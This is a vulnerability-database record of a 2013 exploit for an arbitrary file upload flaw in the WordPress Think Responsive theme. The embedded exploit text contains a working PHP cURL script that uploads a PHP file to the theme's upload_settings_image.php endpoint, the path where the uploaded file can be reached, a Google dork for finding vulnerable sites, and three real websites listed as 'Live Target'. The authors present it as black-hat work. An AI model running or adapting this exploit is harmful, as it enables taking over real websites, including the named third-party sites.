DATABASE RESOURCES PRICING ABOUT US

{"id": "1337DAY-ID-21452", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress Think Responsive Themes Arbitrary File Upload Vulnerability", "description": "Exploit for php platform in category web applications", "published": "2013-11-02T00:00:00", "modified": "2013-11-02T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/21452", "reporter": "Byakuya", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-01-08T15:16:12", "viewCount": 10, "enchantments": {"score": {"value": 0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "sourceHref": "https://0day.today/exploit/21452", "sourceData": "###################################################################################################\r\n#_________ .___ _______ ___. .__ \r\n#\\_ ___ \\ ____ __| _/____ \\ \\ ______ _ _\\_ |__ |__| ____ \r\n#/ \\ \\/ / _ \\ / __ |/ __ \\ / | \\_/ __ \\ \\/ \\/ /| __ \\| |/ __ \\ \r\n#\\ \\___( <_> ) /_/ \\ ___/ / | \\ ___/\\ / | \\_\\ \\ \\ ___/ \r\n# \\______ /\\____/\\____ |\\___ > \\____|__ /\\___ >\\/\\_/ |___ /__|\\___ >\r\n# \\/ \\/ \\/ \\/ \\/ \\/ \\/ \r\n###################################################################################################\r\n# Exploit Title: WordPress Think Responsive Themes Arbitrary File Upload Vulnerability\r\n# Author: Byakuya\r\n# Date: 11/01/2013\r\n# Vendor Homepage: http://themeforest.net/\r\n# Themes Link: http://themeforest.net/item/think-responsive-portfolio-and-blog/2281513\r\n# Price: $40\r\n# Affected Version: v1.0\r\n# Infected File: upload_settings_image.php\r\n# Category: webapps/php\r\n# Google dork: inurl:/wp-content/themes/thinkresponsive\r\n# Tested on : Windows/Linux\r\n###################################################################################################\r\n\r\n# Exploit & POC :\r\n\r\n<?php\r\n$uploadfile=\"up.php\";\r\n$ch = curl_init(\"http://127.0.0.1/wordpress/wp-content/themes/ThinkResponsive/includes/uploadify/upload_settings_image.php\");\r\ncurl_setopt($ch, CURLOPT_POST, true); \r\ncurl_setopt($ch, CURLOPT_POSTFIELDS,\r\n array('Filedata'=>\"@$uploadfile\"));\r\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\r\n$postResult = curl_exec($ch);\r\ncurl_close($ch);\r\nprint \"$postResult\";\r\n?>\r\n\r\n#File path: \r\nhttp://127.0.0.1/wordpress/wp-content/uploads/settingsimages/up.php\r\n\r\n#Live Target :\r\nhttp://lucasjackson.net/wp-content/themes/ThinkResponsive/ThinkResponsive/includes/uploadify/upload_settings_image.php\r\nhttp://runamuckdesign.com/newsite/wp-content/themes/ThinkResponsive/includes/uploadify/upload_settings_image.php\r\nhttp://www.theptmg.com/wp-content/themes/ThinkResponsive/includes/uploadify/upload_settings_image.php\r\n\r\n#Credit: ./Byakuya ./Mr Ohsem ./Cai ./RatKid ./Agam ./Lord-Router ./X-Tuned ./Rec0ded ./Code-Newbie ./Newbie-Security\r\n#Facebook: https://www.facebook.com/CodeNewbieCrew\r\n#Website: http://www.codenewbie.net / http://www.newbie-security.or.id/\r\n#Malaysia & Indonesia BlackHat\r\n###################################################################################################\n\n# 0day.today [2018-01-08] #", "_state": {"dependencies": 1645324256, "score": 1659766679, "epss": 1678812679}}

{}